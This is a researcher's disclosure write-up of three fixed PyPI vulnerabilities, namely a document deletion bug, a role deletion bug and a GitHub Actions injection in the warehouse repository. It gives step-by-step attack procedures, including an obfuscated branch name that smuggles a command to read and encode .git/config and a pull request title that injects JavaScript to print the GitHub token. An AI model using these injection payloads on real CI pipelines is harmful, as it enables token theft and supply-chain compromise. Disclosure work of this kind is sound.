Preface
(日本語版も公開されています。)
While PyPI has a security page, they don’t have a clear policy for vulnerability assessments.1
This article describes the vulnerabilities that were reported as potential vulnerabilities, using publicly available information. This was done without actually exploiting / demonstrating the vulnerabilities.
This article is not intended to encourage you to perform an unauthorized vulnerability assessment.
If you find any vulnerabilities in PyPI, please report them to security@python.org.2
TL;DR
There was a vulnerability in GitHub Actions of PyPI’s repository, which allowed a malicious pull request to execute an arbitrary command.
This allows an attacker to obtain write permission against the repository, which could lead to arbitrary code execution on pypi.org.
About PyPI
PyPI is the package registry used by Python’s package manager (pip
), and is referenced when you run commands such as pip install [package name]
.
Many projects including Flask and TensorFlow are indirectly using PyPI.
Reasons for investigation
While reading Max Justicz’s blogpost, I noticed that they reported a vulnerability to PyPI.
After checking the advisory mentioned in the article, I found that source codes of PyPI are published on GitHub. So I decided to read it.
Investigation of source code
The current source code of PyPI is in pypa/warehouse repository.
A quick read of the code revealed that it’s using a web framework for Python called Pyramid.
After reading the documentation of Pyramid, I continued reading the codes of PyPI. And found these 2 vulnerabilities.
Arbitrary Legacy Document Deletion
PyPI had a documentation feature that can be used in Python projects.
They deleted this feature as usage of this feature didn’t increase, but they didn’t delete existing documents.
So, a feature to delete these documents was requested and was implemented in this pull request.
This feature removes the document by using the following codes internally:
def remove_by_prefix(self, prefix):
if self.prefix:
prefix = os.path.join(self.prefix, prefix)
keys_to_delete = []
keys = self.s3_client.list_objects_v2(Bucket=self.bucket_name, Prefix=prefix)
for key in keys.get("Contents", []):
keys_to_delete.append({"Key": key["Key"]})
if len(keys_to_delete) > 99:
self.s3_client.delete_objects(
Bucket=self.bucket_name, Delete={"Objects": keys_to_delete}
)
keys_to_delete = []
if len(keys_to_delete) > 0:
self.s3_client.delete_objects(
Bucket=self.bucket_name, Delete={"Objects": keys_to_delete}
)
As you can see from the code snippet above, it’s using the list_objects_v2
function with the prefix
parameter to fetch objects to delete.
And names of a user-owned project are passed into the prefix
parameter.
This means that if someone deleted legacy documents in the project named examp
, it’ll delete documents of projects with the name that starts with examp
(e.g. example
, exampleasdf
)
Arbitrary Role Deletion
PyPI has a permission management feature for packages.
In this feature, the project owner can grant / remove permissions. And there was a vulnerability in this removal process.
While fetching permisison information from the database, PyPI used the following codes:
role = (
request.db.query(Role)
.join(User)
.filter(Role.id == request.POST["role_id"])
.one()
)
As you can see from the code snippet above, it’s not specifying the project ID while fetching the permission information to delete.
Hence, an attacker was able to delete other projects’ permission by assuming role_id
.3
Remote code execution
As mentioned above, I reported two vulnerabilities discovered during the source code investigation.
However, these vulnerabilities don’t have many impacts and can only be used for harassment at best.
I wanted to report something that had a little more impact, so I decided to look for a vulnerability that could be used to execute arbitrary codes.
And then, I read the code for the package upload function and project management function, but I could not find any vulnerabilities that could lead to arbitrary code execution.
While taking a break, I found an article named Unintended Deployments to PyPI Servers.
After reading this article carefully, I found that the code pushed to the main
branch of the pypa/warehouse repository will be automatically deployed to pypi.org
.
In other words, if I can obtain write permission for this repository, it’s possible to execute arbitrary codes on pypi.org
.
Therefore, I checked the workflow file of GitHub Actions, which has write permission for the repository by default, and I found the following vulnerability.
Investigation of the workflow file
In pypa/warehouse, there is a workflow called combine-prs.yml.
This workflow is used to collect pull requests that have branch names starting with dependabot
and merge them into a single pull request.
As Dependabot doesn’t have a feature to merge all pull requests, they used this workflow to simulate it.
In this workflow, there is no pull request author verification.
This means that if someone created a pull request that has a branch name starting with dependabot
, it’s possible to force this workflow to process the crafted pull request.
However, this workflow only combines pull requests into a single pull request.
So, the pull request generated by this workflow will be reviewed by a human, and if it contains malicious changes, they’ll simply discard it.
Therefore, this couldn’t be used directly to execute arbitrary codes.
But, as I read through the code, I realized that there was another vulnerability.
In this line, combine-prs.yml prints branch lists of pull requests by using the following code.
run: |
echo "${{steps.fetch-branch-names.outputs.result}}"
It’s a simple echo
command, which looks fine at first glance, but it’s not safe due to the GitHub Actions’ behavior.
As described in Keeping your GitHub Actions and workflows secure: Untrusted input, ${{ }}
expression will be evaluated before being passed into Bash.
This means that ${{ }}
expression doesn’t care about the context in Bash, so if steps.fetch-branch-names.outputs.result
contains strings like ";curl https://example.com;#
, curl https://example.com
will be executed.
Because this workflow used actions/checkout
, .git/config
contains secrets.GITHUB_TOKEN
, which has the write permissions.
So, by executing commands like cat .git/config
, it’s possible to leak GitHub Access Token with write permission against the pypa/warehouse repository.
As described above, if someone pushed changes to the main
branch, it’ll trigger the automatic deployment to pypi.org
.
Hence, by using the following steps, it was possible to execute arbitrary codes on pypi.org
.
- Fork pypa/warehouse
- In forked repository, create a branch named
dependabot;cat$IFS$(echo$IFS'LmdpdA=='|base64$IFS'-d')/config|base64;sleep$IFS'10000';#
4 - Add harmless modification to the created branch
- Create a pull request with a harmless name (e.g.:
WIP
) - Wait for
combine-prs.yml
to be executed - A GitHub Access Token that has the write permissions against pypa/warehouse will be leaked, so add an arbitrary modification to the
main
branch - Modified codes will be deployed to
pypi.org
I reported this vulnerability to Python’s security team, and they fixed it in this commit.
(Update: 2021/07/31 12:55 UTC)
@mrtc0 mentioned that the attack procedure above doesn’t work.
After checking the steps above, I confirmed that it’s necessary to use a different attack procedure instead of the attack procedure described above.
すいません、質問です。該当 Workflow の https://t.co/zQUi6bw1rC の部分で context.repo.owner には Workflow を実行したリポジトリの所有者(pypa)が入るので、commit が見つからずに Workflow は中止されると思うのですが、そうではないのでしょうか...?
— Kohei MORITA (@mrtc0) July 31, 2021
In line 119 of combine-prs.yml, there are codes like the following.
script: |
const prString = `${{ steps.fetch-branch-names.outputs.prs-string }}`;
As mentioned earlier, the ${{ }}
expression doesn’t care about the context.
So, if steps.fetch-branch-names.outputs.prs-string
contains strings like `;console.log("test")//
, console.log("test")
would be executed.
Since steps.fetch-branch-names.outputs.prs-string
contains the title of pull requests, it was possible to execute arbitrary commands on pypi.org
by using the following attack procedure.
- Fork pypa/warehouse
- Find a branch that starts with
dependabot
inpypa/warehouse
- In forked repository, add a harmless modification to the branch that you found in step 2
- Create a pull request named
`;github.auth().then(auth=>console.log(auth.token.split("")))//
- Wait for
combine-prs.yml
to be executed - A GitHub Access Token that has the write permissions against pypa/warehouse will be leaked, so add an arbitrary modification to the
main
branch - Modified codes will be deployed to
pypi.org
Conclusion
The vulnerabilities described in this article had a significant impact on the Python ecosystem.
As I’ve mentioned several times before, some supply chains have critical vulnerabilities.
However, a limited number of people are researching supply chain attacks, and most supply chains are not properly protected.
Therefore, I believe that it’s necessary for users who depend on the supply chain to actively contribute to improving security in the supply chain.
If you have any questions / comments about this article, please send a message to @ryotkak on Twitter.
Timeline
Date (UTC) | Event |
---|---|
July 25, 2021 | Found / Reported document deletion vulnerability |
July 26, 2021 | Fixed document deletion vulnerability |
July 26, 2021 | Found / Reported role deletion vulnerability |
July 27, 2021 | Found / Reported combine-prs vulnerability |
July 27, 2021 | Fixed role deletion vulnerability |
July 27, 2021 | Fixed combine-prs vulnerability |
July 29, 2021 | Published the advisory |
July 30, 2021 | Published this article |
They have a plan to improve security page: https://github.com/pypa/warehouse/issues/7970 ↩︎
Reference: Reporting a security issue ↩︎
As a side note, I thought that
role_id
is a sequential number, and told them “it’s possible to spray the ID”. But in fact, it was a UUID. ↩︎This branch name will execute
cat .git/config | base64; sleep 10000
if it’s executed in Bash ↩︎